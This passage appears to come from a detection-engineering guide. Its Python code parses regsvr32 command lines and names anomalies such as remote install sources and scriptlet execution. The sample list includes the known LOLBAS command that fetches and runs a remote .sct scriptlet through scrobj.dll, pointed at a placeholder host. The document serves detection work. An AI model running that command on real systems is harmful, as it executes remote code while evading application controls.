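            inv.other_flags.append(letter)
        if body[:1] in ("/", "-"):
            body = body[1:]                # fused flag follows, keep consuming
        else:
            break


def parse_regsvr32(cmdline: str) -> RegsvrInvocation:
    """Parse a full process command line (image name first) into its flags."""
    inv = RegsvrInvocation()
    tokens = [t.strip('"') for t in _TOKEN_RE.findall(cmdline)]
    for tok in tokens[1:]:                 # tokens[0] is regsvr32 itself
        if tok[:1] in ("/", "-") and len(tok) > 1:
            _apply_flag(inv, tok)
        elif inv.dll is None:
            inv.dll = tok
    return inv


def assess(cmdline: str) -> list:
    """Name the anomalies a command line exhibits; [] means nothing notable."""
    inv = parse_regsvr32(cmdline)
    target = (inv.install_cmdline or "").lower()
    dll = (inv.dll or "").lower()
    checks = [
        ("install_without_noregister", inv.install and not inv.no_register),
        ("remote_install_source", target.startswith(("http://", "https://"))),
        ("http_ip_pattern", bool(_HTTP_IP_RE.match(target))),
        ("scriptlet_execution", target.split("?")[0].endswith(".sct")
         or dll.rsplit("\\", 1)[-1] == "scrobj.dll"),
        ("non_dll_target", bool(dll) and not dll.endswith(".dll")),
        ("no_dll_argument", not dll and "?" not in inv.other_flags),
    ]
    return [name for name, hit in checks if hit]


# Constructed samples: two benign registrations, the LOLBAS pattern, a non-DLL target.
SAMPLE_COMMAND_LINES = [
    "regsvr32 schmmgmt.dll",
    'regsvr32 /S "C:\\Program Files\\Oracle\\VirtualBox\\VboxC.dll"',
    "regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll",
    "regsvr32.exe /s C:\\Users\\Public\\photo.jpg",
]


def scan(cmdlines: list) -> dict:
    """Map each command line to its anomaly names."""
    return {c: assess(c) for c in cmdlines}
```

Apply `scan()` to the CommandLine field of process-creation events whose Image ends in `\regsvr32.exe`; the anomaly names map one-to-one onto the rule titles in the table above, so a hit can be routed to the matching rule.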
MIT License. Copyright (c) 2020-2021 Strontic.